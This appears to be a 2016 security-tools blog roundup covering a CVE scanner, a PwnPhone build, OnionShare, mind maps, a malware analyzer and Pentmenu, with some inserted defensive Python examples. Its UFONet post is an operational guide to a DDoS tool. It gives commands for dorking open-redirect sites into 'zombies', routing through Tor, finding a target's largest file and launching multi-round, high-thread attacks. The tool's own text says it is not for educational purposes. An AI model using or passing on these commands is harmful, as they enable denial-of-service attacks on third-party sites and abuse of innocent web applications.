Thursday, September 22, 2016

Vulnerability Scanner - HellRaiser


HellRaiser Vulnerability Scanner
HellRaiser Vulnerability Scanner scans targets with nmap and then correlates the CPEs it finds with cve-search to enumerate known vulnerabilities.
To test and run HellRaiser Vulnerability Scanner you need Ruby, Bundler and Rails installed; see https://gorails.com/setup/ubuntu/16.04

Install redis-server and nmap.
sudo apt-get update
sudo apt-get install redis-server nmap


Clone HellRaiser repository, change to hellraiser web app directory and run bundle install and bundle exec rake db:migrate.
git clone https://github.com/m0nad/HellRaiser/
cd HellRaiser/hellraiser/
bundle install
bundle exec rake db:migrate

Start

Start redis server.
redis-server
Go to the hellraiser web app directory and start sidekiq.
bundle exec sidekiq
Go to the hellraiser web app directory and start rails server.
rails s


Usage

Access http://127.0.0.1:3000
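As an added example (not HellRaiser's own Ruby code), the correlation step described above in Python: pull the CPEs nmap attached to open ports out of its XML output and build the cve-search lookup for each versioned one. The nmap XML is constructed sample data, and the cve-search `/api/cvefor/<cpe>` route on a local port 5000 instance is an assumption of this example; nothing is sent over the network.

```python
import xml.etree.ElementTree as ET
from urllib.parse import quote

# Constructed sample of `nmap -sV -oX` output for one host (not a real scan).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.2p2">
          <cpe>cpe:/a:openbsd:openssh:7.2p2</cpe>
          <cpe>cpe:/o:linux:linux_kernel</cpe>
        </service>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.18">
          <cpe>cpe:/a:apache:http_server:2.4.18</cpe>
        </service>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed"/>
        <service name="https"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Assumed local cve-search instance; the /api/cvefor/<cpe> route is taken from
# cve-search's web API and is an assumption of this example, not from the page.
CVE_SEARCH_BASE = "http://127.0.0.1:5000"


def extract_cpes(xml_text):
    """Return (host, port, protocol, cpe) for every CPE nmap attached to an open port."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports carry no service fingerprint worth correlating
            service = port.find("service")
            if service is None:
                continue
            for cpe in service.findall("cpe"):
                if cpe.text:
                    findings.append((addr, int(port.get("portid")), port.get("protocol"), cpe.text.strip()))
    return findings


def has_version(cpe):
    """True when a CPE 2.2 URI names a version (cpe:/part:vendor:product:version...).

    Unversioned CPEs such as cpe:/o:linux:linux_kernel would match every CVE ever
    filed for that product, so they are skipped rather than flooding the report.
    """
    parts = cpe.split(":")
    return len(parts) >= 5 and parts[4] not in ("", "*", "-")


def cvefor_url(cpe, base=CVE_SEARCH_BASE):
    """Build the cve-search lookup URL; ':' and '/' stay literal in the CPE path segment."""
    return f"{base}/api/cvefor/{quote(cpe, safe=':/')}"


def correlation_plan(xml_text, base=CVE_SEARCH_BASE):
    """List the lookups a HellRaiser-style correlation would perform for one scan."""
    plan = []
    for addr, port, proto, cpe in extract_cpes(xml_text):
        if not has_version(cpe):
            continue
        plan.append({"host": addr, "port": port, "proto": proto, "cpe": cpe, "url": cvefor_url(cpe, base)})
    return plan


if __name__ == "__main__":
    for entry in correlation_plan(SAMPLE_NMAP_XML):
        print(f"{entry['host']}:{entry['port']}/{entry['proto']}  {entry['cpe']}  ->  {entry['url']}")
```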




Tuesday, September 20, 2016

Build Your Own - PwnPhone

Build Your Own PwnPhone
We’ll attempt to show you how to build your own Pwn Phone running the Kali operating system and our AOPP (Android Open Pwn Project) image.
Let’s get cracking…

Flashing the Phone

  1. Download the Recovery image for your device:
    https://twrp.me/Devices
  2. Connect the device to the host machine via USB cable.
  3. Power off the device and boot into the Bootloader:
    Press and hold the Power & Volume-Down buttons
  4. Confirm the device is recognized by the host machine:
    (a device should be listed when the command returns)
    $ fastboot devices
  5. Unlock the device:
    $ fastboot oem unlock
  6. Once unlocked, flash the Recovery image:
    $ fastboot flash recovery <name-of-recovery-image>.img
  7. Once the Recovery image has been flashed, boot into Recovery from the Bootloader:
    Use the Volume-Down/Up buttons to cycle through the Bootloader options and then the Power button to select
  8. If prompted, swipe “Swipe to Allow Modifications”.
  9. Once in Recovery, wipe the device:
    Tap Wipe > Advanced Wipe > tap: Dalvik/ART cache, System, Cache, Data > swipe “Swipe to Wipe”
  10. Once wiped, do NOT boot into System (You don’t have one; you just wiped it). Tap the Home button to return to the Recovery home screen.
  11. Confirm again the device is recognized by the host machine:
    (a device should be listed when the command returns)
    $ adb devices
  12. From the host machine, push the downloaded AOPP ROM zip to the device sdcard:
    $ adb push <name-of-rom-zip>.zip /sdcard/
  13. On device, tap Install and then select the AOPP ROM zip from /sdcard.
  14. Swipe “Swipe to Confirm Flash”
  15. Once installed, tap “Reboot System”

OK Now Let’s Build the Phone

Downloading the Source

  1. Refer to “Downloading and Building Requirements” before proceeding:
    https://source.android.com/source/requirements.html
  2. Refer to “Downloading the Source” before proceeding:
    https://source.android.com/source/downloading.html
  3. Create a directory for the build system to live in and cd into that directory:
    $ mkdir <WORKING_DIR>
    $ cd <WORKING_DIR>
  4. Initialize a local repository using this source tree, use the command:
    $ repo init -u git@github.com:aopp/android_platform.git -b px-0.1
  5. Sync the repository, use:
    $ repo sync

Building

Devices are referred to by codename (e.g. hammerhead). Make sure to use this when substituting <device-codename> in the following instruction set.
  1. Refer to “Building the System” before proceeding:
    https://source.android.com/source/building.html
  2. To initialize the build environment, use the following command:
    $ . build/envsetup.sh
  3. Prepare the build environment (download device-tree and dependencies) for your specific device:
    $ breakfast <device-codename>
  4. Connect the device running a working AOPP/AOSP ROM to the host machine via USB.
  5. Make sure it is booted into system and confirm the device is recognized by the host machine:
    (a device should be listed when the command returns)
    $ adb devices
  6. Enter the device directory:
    $ cd <WORKING_DIR>/device/<vendor>/<device-codename>/
  7. Extract the proprietary binaries from your device:
    $ ./extract-files.sh
  8. Return to the root of the build system:
    $ croot
  9. Start a build run for your device:
    $ brunch <device-codename>
  10. Once complete, the ROM zip can be found in the out/ directory:
    $ cd out/target/product/<device-codename>
  11. The flashable ROM zip (product of the build run) will be located in the out/ directory as:
    aopp-0.1-<build-date>-UNOFFICIAL-<device-codename>.zip

Flashing

  1. Download and install the command line tools for your OS: https://developer.android.com/studio/index.html#downloads
  2. Download the AOPP ROM for your device:
    https://wiki.pwnieexpress.com/index.php/Official_devices
  3. Download the Recovery image for your device:
    https://twrp.me/Devices
  4. Connect the device to the host machine via USB cable.
  5. Power off the device and boot into the Bootloader:
    Press and hold the Power & Volume-Down buttons
  6. Confirm the device is recognized by the host machine:
    (a device should be listed when the command returns)
    $ fastboot devices
  7. Unlock the device:
    $ fastboot oem unlock
  8. Once unlocked, flash the Recovery image:
    $ fastboot flash recovery <name-of-recovery-image>.img
  9. Once the Recovery image has been flashed, boot into Recovery from the Bootloader:
    Use the Volume-Down/Up buttons to cycle through the Bootloader options and then the Power button to select
  10. If prompted, swipe “Swipe to Allow Modifications”.
  11. Once in Recovery, wipe the device:
    Tap Wipe > Advanced Wipe > tap: Dalvik/ART cache, System, Cache, Data > swipe “Swipe to Wipe”
  12. Once wiped, do NOT boot into System (You don’t have one; you just wiped it). Tap the Home button to return to the Recovery home screen.
  13. Confirm again the device is recognized by the host machine:
    (a device should be listed when the command returns)
    $ adb devices
  14. From the host machine, push the downloaded AOPP ROM zip to the device sdcard:
    $ adb push <name-of-rom-zip>.zip /sdcard/
  15. On device, tap Install and then select the AOPP ROM zip from /sdcard.
  16. Swipe “Swipe to Confirm Flash”
  17. Download SuperSU from Chainfire here:
    https://download.chainfire.eu/969/SuperSU/UPDATE-SuperSU-v2.76-20160630161323.zip
  18. Push the SuperSU zip to /sdcard/:
    $ adb push <SuperSU-zip-name>.zip /sdcard/
  19. Once installed, tap “Reboot System”
  20. Hack the Gibson…and remember…hugs are worth more than handshakes

Source: pwnieexpress



Monday, September 19, 2016

Secure Anonymous File Sharing - OnionShare

OnionShare lets you securely and anonymously share files of any size. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable URL to access and download the files. It doesn’t require setting up a server on the internet somewhere or using a third party filesharing service. You host the file on your own computer and use a Tor onion service to make it temporarily accessible over the internet. The other user just needs to use Tor Browser to download the file from you.

Features:
  • A user-friendly drag-and-drop graphical user interface that works in Windows, Mac OS X, and Linux
  • Ability to share multiple files and folders at once
  • Support for multiple people downloading files at once
  • Automatically copies the unguessable URL to your clipboard
  • Shows you the progress of file transfers
  • When file is done transferring, automatically closes OnionShare to reduce the attack surface
  • Localized into several languages, and supports international unicode filenames

When users want to send files, the program creates a password-protected, temporary website hosted on the Tor network—what’s known as a Tor Hidden Service—that runs on their computer. They provide the recipient with the URL and password for that site, preferably via a message encrypted with a tool like PGP or Off-The-Record encrypted instant messaging. The recipient visits that URL in a Tor Browser and downloads the file from that temporary, untraceable website, without needing to have a copy of Onionshare.

As soon as the person has downloaded the file, you can just cancel the web server and the file is no longer accessible to anyone.

"It’s basically 100 percent darknet."



How to Use

Before you can share files, you need to open Tor Browser in the background. This will provide the Tor service that OnionShare uses to start the onion service.

Open OnionShare and drag and drop files and folders you wish to share, and click Start Sharing. It will show you a .onion URL such as http://asxmi4q6i7pajg2b.onion/egg-cain and copy it to your clipboard. This is the secret URL that can be used to download the file you’re sharing. If you’d like multiple people to be able to download this file, uncheck the “close automatically” checkbox.

Send this URL to the person you’re trying to send the files to. If the files you’re sending aren’t secret, you can use normal means of sending the URL: emailing it, posting it to Facebook or Twitter, etc. If you’re trying to send secret files then it’s important to send this URL securely.

The person who is receiving the files doesn’t need OnionShare. All they need is to open the URL you send them in Tor Browser to be able to download the file.

Using the command line version

In Linux: Just run onionshare from the terminal.
In Windows: Add C:\Program Files (x86)\OnionShare to your PATH. Now you can run onionshare.exe in a command prompt.
In Mac OS X: Run ln -s /Applications/OnionShare.app/Contents/MacOS/onionshare /usr/local/bin. Now you can run onionshare from the terminal.


Onionshare can be particularly useful when someone sending a file wants to remain anonymous even to the recipient. If whistleblowers can securely send an Onionshare URL and password to a journalist, they potentially could use it to leak secrets anonymously without being exposed. That flips the model of how Tor enables leaks: Sites like WikiLeaks and news organizations using the anonymous leak software SecureDrop host their own Tor Hidden Services. Onionshare could put more power in whistleblowers’ hands, helping them send secrets to journalists who don’t have that sort of anonymous submission system in place.

What it protects against

  • Third parties don’t have access to files being shared. The files are hosted directly on the sender’s computer and don’t get uploaded to any server. Instead, the sender’s computer becomes the server. Traditional ways of sending files, like in an email or using a cloud hosting service, require trusting the service with access to the files being shared.
  • Network eavesdroppers can’t spy on files in transit. Because connections between Tor onion services and Tor Browser are end-to-end encrypted, no network attackers can eavesdrop on the shared files while the recipient is downloading them. If the eavesdropper is positioned on the sender’s end, the recipient’s end, or is a malicious Tor node, they will only see Tor traffic. If the eavesdropper is a malicious rendezvous node used to connect the recipient’s Tor client with the sender’s onion service, the traffic will be encrypted using the onion service key.
  • Anonymity of sender and recipient are protected by Tor. OnionShare and Tor Browser protect the anonymity of the users. As long as the sender anonymously communicates the OnionShare URL with the recipient, the recipient and eavesdroppers can’t learn the identity of the sender.
  • If an attacker enumerates the onion service, the shared files remain safe. There have been attacks against the Tor network that can enumerate onion services. If someone discovers the .onion address of an OnionShare onion service, they still cannot download the shared files without knowing the slug. The slug is generated by choosing two random words from a list of 6800 words, meaning there are 6800^2, or about 46 million possible slugs. But they can only make 20 wrong guesses before OnionShare stops the server, preventing brute force attacks against the slug. The OnionShare server also checks request URIs using a constant time string comparison function, so timing attacks can’t be used to help guess the slug.
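An added example, not OnionShare's own code, modelling the slug defence described in the last point above in Python: two words drawn from a word list, a constant-time comparison of the requested slug, and a server that stops after 20 wrong guesses. The 16-word list is a constructed stand-in for the real 6800-word list; the keyspace and probability helpers use the real size.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed stand-in for OnionShare's word list (the real one has 6800 entries).
WORDLIST = [
    "egg", "cain", "apple", "brook", "cedar", "delta", "ember", "frost",
    "grove", "harbor", "ivory", "jade", "kiln", "lumen", "maple", "nectar",
]
REAL_WORDLIST_SIZE = 6800   # from the OnionShare description above
MAX_WRONG_GUESSES = 20      # server stops after this many bad slugs


def generate_slug(wordlist=WORDLIST):
    """Two words drawn with a CSPRNG, joined as in http://<onion>/egg-cain."""
    return f"{secrets.choice(wordlist)}-{secrets.choice(wordlist)}"


def slug_keyspace(wordlist_size=REAL_WORDLIST_SIZE):
    return wordlist_size ** 2   # 6800^2 = 46,240,000 possible slugs


def max_guess_success_probability(wordlist_size=REAL_WORDLIST_SIZE, max_guesses=MAX_WRONG_GUESSES):
    """Upper bound on an attacker's chance of hitting the slug before the server shuts down."""
    return max_guesses / slug_keyspace(wordlist_size)


def slug_from_url(url):
    """The secret part of a share URL is its path."""
    return urlparse(url).path.strip("/")


class SlugGate:
    """Models OnionShare's request check: constant-time compare plus a wrong-guess budget."""

    def __init__(self, slug, max_wrong=MAX_WRONG_GUESSES):
        self._slug = slug.encode()
        self.max_wrong = max_wrong
        self.wrong = 0
        self.running = True

    def check(self, candidate):
        """Return True only for the right slug while the server is still up."""
        if not self.running:
            return False
        # compare_digest's run time does not depend on where the strings first differ,
        # so response timing leaks nothing about how close a guess was.
        if hmac.compare_digest(candidate.encode(), self._slug):
            return True
        self.wrong += 1
        if self.wrong >= self.max_wrong:
            self.running = False   # stop serving: brute force is cut off after 20 misses
        return False


if __name__ == "__main__":
    slug = generate_slug()
    gate = SlugGate(slug)
    print("share URL path:", slug, "| keyspace:", slug_keyspace(),
          "| P(guess before shutdown) <=", max_guess_success_probability())
    for attempt in ("wrong-word",) * MAX_WRONG_GUESSES:
        gate.check(attempt)
    print("still serving after 20 misses?", gate.running)
```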

What it doesn’t protect against

  • Communicating the OnionShare URL might not be secure. The sender is responsible for securely communicating the OnionShare URL with the recipient. If they send it insecurely (such as through an email message, and their email is being monitored by an attacker), the eavesdropper will learn that they’re sending files with OnionShare. If the attacker loads the URL in Tor Browser before the legitimate recipient gets to it, they can download the files being shared. If this risk fits the sender’s threat model, they must find a more secure way to communicate the URL, such as in an encrypted email, chat, or voice call. This isn’t necessary in cases where the files being shared aren’t secret.
  • Communicating the OnionShare URL might not be anonymous. While OnionShare and Tor Browser allow for anonymously sending files, if the sender wishes to remain anonymous they must take extra steps to ensure this while communicating the OnionShare URL. For example, they might need to use Tor to create a new anonymous email or chat account, and only access it over Tor, to use for sharing the URL. This isn’t necessary in cases where there’s no need to protect anonymity, such as coworkers who know each other sharing work documents.

Building OnionShare

Start by getting a copy of the source code:
git clone https://github.com/micahflee/onionshare.git
cd onionshare
For .deb-based distros (like Debian, Ubuntu, Linux Mint):
Install the needed dependencies:
sudo apt-get install -y python3-flask python3-stem python3-pyqt5 python-nautilus
After that you can try both the CLI and the GUI version of OnionShare:
./install/scripts/onionshare
./install/scripts/onionshare-gui
A script to build a .deb package and install OnionShare easily is also provided for your convenience:
sudo apt-get install -y build-essential fakeroot python3-all python3-stdeb dh-python python-nautilus
./install/build_deb.sh
sudo dpkg -i deb_dist/onionshare_*.deb
Note that OnionShare uses stdeb to generate Debian packages, and python3-stdeb is not available in Ubuntu 14.04 (Trusty). Because of this, you can’t use the build_install.sh script to build the .deb file in versions of Ubuntu 14.04 and earlier. However, .deb files you build in later versions of Ubuntu will install and work fine in 14.04.
For .rpm-based distros (Red Hat, Fedora, CentOS):
sudo dnf install -y rpm-build python3-flask python3-stem python3-qt5 nautilus-python
./install/build_rpm.sh
sudo yum install -y dist/onionshare-*.rpm
Depending on your distribution, you may need to use yum instead of dnf.
For ArchLinux:
There is a PKGBUILD available here that can be used to install OnionShare.




Wednesday, September 14, 2016

SecurityTests - #3 Mind Map



Security testing is a process intended to reveal flaws in the security mechanisms of an information system that protect data and maintain functionality as intended. Due to the logical limitations of security testing, passing security testing is not an indication that no flaws exist or that the system adequately satisfies the security requirements.

Typical security requirements may include specific elements of confidentiality, integrity, authentication, availability, authorization and non-repudiation. The actual security requirements tested depend on the security requirements implemented by the system. Security testing as a term has a number of different meanings and can be completed in a number of different ways. As such, a security taxonomy helps us to understand these different approaches and meanings by providing a base level to work from.


Source: Wikipedia
Source: amanhardikar

By OffSec

Cryptography - #2 Mind Map



Cryptography or cryptology (from Greek κρυπτός kryptós, "hidden, secret"; and γράφειν graphein, "writing", or -λογία -logia, "study", respectively) is the practice and study of techniques for secure communication in the presence of third parties called adversaries. More generally, cryptography is about constructing and analyzing protocols that prevent third parties or the public from reading private messages; various aspects in information security such as data confidentiality, data integrity, authentication, and non-repudiation are central to modern cryptography. Modern cryptography exists at the intersection of the disciplines of mathematics, computer science, and electrical engineering. Applications of cryptography include ATM cards, computer passwords, and electronic commerce.


Source: Wikipedia
Source: amanhardikar

By OffSec

Monday, September 12, 2016

Open Redirect DDoS Tool - UFONet

UFONet is a tool designed to launch DDoS attacks against a target by abusing 'Open Redirect' vectors on third-party web applications, which act like a botnet. UFONet abuses OSI Layer 7 (HTTP) to create/manage 'zombies' and to conduct different attacks using GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc. Remember, this tool is NOT for educational purposes. Usage of UFONet for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.


Developers assume no liability and are not responsible for any misuse or damage caused by this program.

See these links for more info:

Installation:

UFONet runs on many platforms. It requires Python (>2.7.9) and the following libraries:
  • python-pycurl – Python bindings to libcurl
  • python-geoip – Python bindings for the GeoIP IP-to-country resolver library
On Debian-based systems (ex: Ubuntu), run:
sudo apt-get install python-pycurl python-geoip
Source libs: Python, PyCurl, PyGeoIP

Usage:

  Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v, --verbose active verbose on requests
--update check for latest stable version
--check-tor check to see if Tor is used properly
--force-yes set 'YES' to all questions
--gui run GUI (UFONet Web Interface)

*Configure Request(s)*:
--proxy=PROXY Use proxy server (tor: 'http://127.0.0.1:8118')
--user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default SPOOFED)
--host=HOST Use another HTTP Host header (default NONE)
--xforw Set your HTTP X-Forwarded-For with random IP values
--xclient Set your HTTP X-Client-IP with random IP values
--timeout=TIMEOUT Select your timeout (default 10)
--retries=RETRIES Retries when the connection timeouts (default 1)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--delay=DELAY Delay in seconds between each HTTP request (default 0)

*Search for 'Zombies'*:
-s SEARCH Search from a 'dork' (ex: -s 'proxy.php?url=')
--sd=DORKS Search from 'dorks' file (ex: --sd 'botnet/dorks.txt')
--sn=NUM_RESULTS Set max number of results for engine (default 10)
--se=ENGINE Search engine to use for 'dorking' (default: bing)
--sa Search massively using all search engines

*Test Botnet*:
-t TEST Update 'zombies' status (ex: -t 'botnet/zombies.txt')
--attack-me Order 'zombies' to attack you (NAT required!)

*Community*:
--download-zombies Download 'zombies' from Community server
--upload-zombies Upload your 'zombies' to Community server
--blackhole Create a 'blackhole' to share your 'zombies'
--up-to=UPIP Upload your 'zombies' to a 'blackhole'
--down-from=DIP Download your 'zombies' from a 'blackhole'

*Research Target*:
-i INSPECT Search biggest file (ex: -i 'http(s)://target.com')

*Configure Attack(s)*:
--no-head Disable check of target's status at start
--disable-isup Disable round check status: 'is target up?'
--disable-aliens Disable 'aliens' web abuse of test services
--disable-droids Disable 'droids' redirectors
-r ROUNDS Set number of rounds (default: 1)
-b PLACE Set place to attack (ex: -b '/path/big.jpg')
-a TARGET Start Web DDoS attack (ex: -a 'http(s)://target.com')

*Special Attack(s)*:
--db=DBSTRESS Set db stress input point (ex: --db 'search.php?q=')



Examples:

Searching for ‘zombies’:
UFONet can dig on different search engines results to find possible ‘Open Redirect’ vulnerable sites. A common query string should be like this:
'proxy.php?url='
'check.cgi?url='
'checklink?uri='
'validator?uri='

For example you can begin a search with:
./ufonet -s 'proxy.php?url='
Or providing a list of “dorks” from a file:
./ufonet --sd 'botnet/dorks.txt'
By default UFONet uses the search engine 'bing', but you can choose a different one:
./ufonet -s 'proxy.php?url=' --se 'bing'
This is the list of available search engines, with the last date on which each was confirmed working:
- bing [17/08/2016: OK!]
- yahoo [17/08/2016: OK!]

You can also search massively using all search engines supported:
./ufonet -s 'proxy.php?url=' --sa
To control how many 'zombies' are retrieved from the search engines you can use:
./ufonet --sd 'botnet/dorks.txt' --sa --sn 20
At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable.
Wanna check if they are valid zombies? (Y/n)
Also, you will be asked to update the list adding automatically only ‘vulnerable’ web apps.
Wanna update your list (Y/n)
If you reply ‘Y’ your new ‘zombies’ will be appended to the file named: zombies.txt

Examples:
+ with verbose: ./ufonet -s 'proxy.php?url=' -v
+ with threads: ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100



Testing botnet:
Open ‘zombies.txt’ (or another file) and create a list of possible ‘zombies’.
URLs of the 'zombies' should look like this:

http://target.com/check?uri=
After that, launch it:
./ufonet -t 'botnet/zombies.txt'
You can order the 'zombies' to attack you and see how they respond using:
./ufonet --attack-me
At the end of the process you will be asked if you want to update the list adding automatically only ‘vulnerable’ web apps.
Wanna update your list (Y/n)
If you reply ‘Y’, your file: zombies.txt will be updated.

Examples:
+ with verbose: ./ufonet -t 'botnet/zombies.txt' -v
+ with proxy TOR: ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
+ with threads: ./ufonet -t 'botnet/zombies.txt' --threads 50



Inspecting a target:
This feature finds the biggest file on the target:
./ufonet -i http://target.com
You can use this when attacking to be more effective:
./ufonet -a http://target.com -b "https://cdn-cyberpunk.netdna-ssl.com/biggest_file_on_target.xxx"

Example:
+input:
./ufonet -i http://target.com
+output:
       [...]

+Image found: images/wizard.jpg
(Size: 63798 Bytes)
------------
+Style (.css) found: fonts.css
(Size: 20448 Bytes)
------------
+Webpage (.php) found: contact.php
(Size: 2483 Bytes)
------------
+Webpage (.php) found: about.php
(Size: 1945 Bytes)
------------
+Webpage (.php) found: license.php
(Size: 1996 Bytes)
------------
================================================================================
=Biggest File: http://target.com/images/wizard.jpg
================================================================================

Attacking a target:
Enter a target to attack with a number of rounds:
./ufonet -a http://target.com -r 10
In this example UFONet will attack the target 10 times for each 'zombie'. That means that if you have a list of 1,000 'zombies', it will launch 1,000 'zombies' x 10 rounds = 10,000 requests at the target.
By default, if you don't specify any rounds, only 1 is applied.
Additionally, you can choose a place to reload on the target's site, for example a large image, a big file or a flash movie. In scenarios where the target doesn't use a cache system this makes the attack more effective.
./ufonet -a http://target.com -b "/images/big_size_image.jpg"

Examples:
+ with verbose: ./ufonet -a http://target.com -r 10 -v
+ with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
+ with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
+ with threads: ./ufonet -a http://target.com -r 10 --threads 500
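From the defender's side, an added example in Python (not part of UFONet): the web apps UFONet enlists as 'zombies' are open redirectors, so a site owner can both spot that abuse in its own access log (redirect parameters pointing at an external host, as in the `proxy.php?url=` pattern above) and close the hole by validating redirect targets. The log lines are constructed; the parameter names beyond `url` and `uri` are assumed common ones.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs

# Constructed Common Log Format lines; hosts and addresses are documentation examples.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Sep/2016:10:00:01 +0000] "GET /proxy.php?url=http://target.example/images/big.jpg HTTP/1.1" 302 0
203.0.113.5 - - [12/Sep/2016:10:00:01 +0000] "GET /proxy.php?url=http://target.example/images/big.jpg HTTP/1.1" 302 0
198.51.100.7 - - [12/Sep/2016:10:00:02 +0000] "GET /check.cgi?url=http://target.example/ HTTP/1.1" 302 0
192.0.2.9 - - [12/Sep/2016:10:00:03 +0000] "GET /proxy.php?url=/local/page.html HTTP/1.1" 302 0
192.0.2.9 - - [12/Sep/2016:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

# Query parameters that commonly carry a redirect destination (url/uri appear in the dorks above;
# the rest are assumed typical names).
REDIRECT_PARAMS = ("url", "uri", "redirect", "next", "return")

CLF_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def external_redirect_host(path):
    """Return the external host a redirect parameter points at, or None if none does."""
    query = parse_qs(urlparse(path).query)
    for param in REDIRECT_PARAMS:
        for value in query.get(param, []):
            target = urlparse(value)
            if target.scheme in ("http", "https") and target.netloc:
                return target.netloc.lower()
    return None


def detect_redirect_abuse(lines):
    """Count redirects to external hosts per destination and per requesting client.

    A burst of redirects from many clients all aimed at one external host is the
    signature of this site being used as a 'zombie' against that host.
    """
    by_target, by_client = Counter(), Counter()
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        host = external_redirect_host(m.group("path"))
        if host:
            by_target[host] += 1
            by_client[m.group("client")] += 1
    return {"by_target": by_target, "by_client": by_client}


def safe_redirect_target(value, allowed_hosts, default="/"):
    """Hardened redirect: allow same-site paths or an allowlisted absolute host; else fall back."""
    if value.startswith("/") and not value.startswith("//"):
        return value  # local path; '//host' would be scheme-relative and is rejected below
    target = urlparse(value)
    if target.scheme in ("http", "https") and target.netloc.lower() in allowed_hosts:
        return value
    return default


if __name__ == "__main__":
    report = detect_redirect_abuse(SAMPLE_LOG.splitlines())
    for host, n in report["by_target"].most_common():
        print(f"{n:3d} redirects to external host {host}")
    print("hardened redirect resolves to:",
          safe_redirect_target("http://target.example/images/big.jpg", {"www.example.org"}))
```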




Nmap Security Scanner - #1 Mind Map



Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich) used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses.


By OffSec

Simple Static Malware Analyzer - SSMA



SSMA is a simple malware analyzer written in Python 3.

Features:
  • Searches for websites, e-mail addresses, IP addresses in the strings of the file.
  • Looks for Windows functions commonly used by malware.
  • Get results from VirusTotal and/or upload files.
  • Malware detection based on Yara-rules - https://virustotal.github.io/yara/
  • Detect well-known software packers.
  • Detect the existence of cryptographic algorithms.
  • Detect anti-debug and anti-virtualization techniques used by malware to evade automated analysis.
  • Find if documents have been crafted to leverage malicious code.

Usage
git clone https://github.com/secrary/SSMA
cd SSMA
sudo pip3 install -r requirements.txt
python3 ssma.py -h
Additional: ssdeep - Installation
More: Simple Static Malware Analyzer
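An added example (not SSMA's own code) of the string-level checks listed in the features above, in Python: pull printable strings from a file image, extract and defang URLs, e-mail addresses and IPs, and flag Windows API names and packer markers. The byte string is a constructed sample rather than a real binary, and the API and packer lists are short illustrative subsets.

```python
import re

# Constructed sample "binary": a few printable strings separated by non-printable bytes.
SAMPLE_BYTES = (
    b"MZ\x90\x00\x03\x00\x00\x00KERNEL32.dll\x00IsDebuggerPresent\x00VirtualAlloc\x00"
    b"\x7f\x00http://update.example-bad.test/payload.bin\x00\xff\xfe"
    b"admin@example-bad.test\x00connect 198.51.100.23:4444\x00\x01\x02UPX0\x00"
)

# Illustrative subsets; a real tool keeps far longer lists (assumption of this example).
SUSPICIOUS_APIS = {
    "anti-debug": {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "NtQueryInformationProcess"},
    "memory/injection": {"VirtualAlloc", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
}
PACKER_MARKERS = {"UPX0", "UPX1", ".aspack", ".themida"}

IOC_PATTERNS = {
    "url": re.compile(r"https?://[^\s\"'<>]+"),
    "email": re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
}


def extract_strings(data, min_len=4):
    """ASCII runs of at least min_len printable characters, like the `strings` tool."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def defang(indicator):
    """Make an indicator safe to paste into a report without it becoming clickable."""
    return indicator.replace("http", "hxxp").replace(".", "[.]")


def analyze(data):
    """Run the string-based checks and return one report dict."""
    strings = extract_strings(data)
    iocs = {name: [] for name in IOC_PATTERNS}
    for s in strings:
        for name, pattern in IOC_PATTERNS.items():
            for hit in pattern.findall(s):
                d = defang(hit)
                if d not in iocs[name]:       # keep first occurrence only
                    iocs[name].append(d)
    api_hits = {cat: sorted(s for s in strings if s in names) for cat, names in SUSPICIOUS_APIS.items()}
    packers = sorted(s for s in strings if s in PACKER_MARKERS)
    return {"strings": strings, "iocs": iocs, "api_hits": api_hits, "packers": packers}


if __name__ == "__main__":
    report = analyze(SAMPLE_BYTES)
    for kind, values in report["iocs"].items():
        print(kind, values)
    print("API hits:", report["api_hits"])
    print("packers:", report["packers"])
```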



A simple Bash Script for Recon and DOS Attacks - Pentmenu



A bash script inspired by pentbox.
Designed to be a simple way to implement various network pentesting functions, including network attacks, using wherever possible readily available software commonly installed on most linux distributions without having to resort to multiple specialist tools.

Sudo is used where necessary.
Tested on Debian and Arch.

Requirements:
  • bash
  • sudo
  • curl
  • netcat (must support '-k' option, openbsd variant recommended)
  • hping3 (or nping can be used as a substitute for flood attacks)
  • openssl
  • stunnel
  • nmap
  • whois (not essential but preferred)

How to use?
  • Download the script:
$ wget https://raw.githubusercontent.com/GinjaChris/pentmenu/master/pentmenu
  • Make it executable:
$ chmod +x ./pentmenu
  • Run it:
$ ./pentmenu
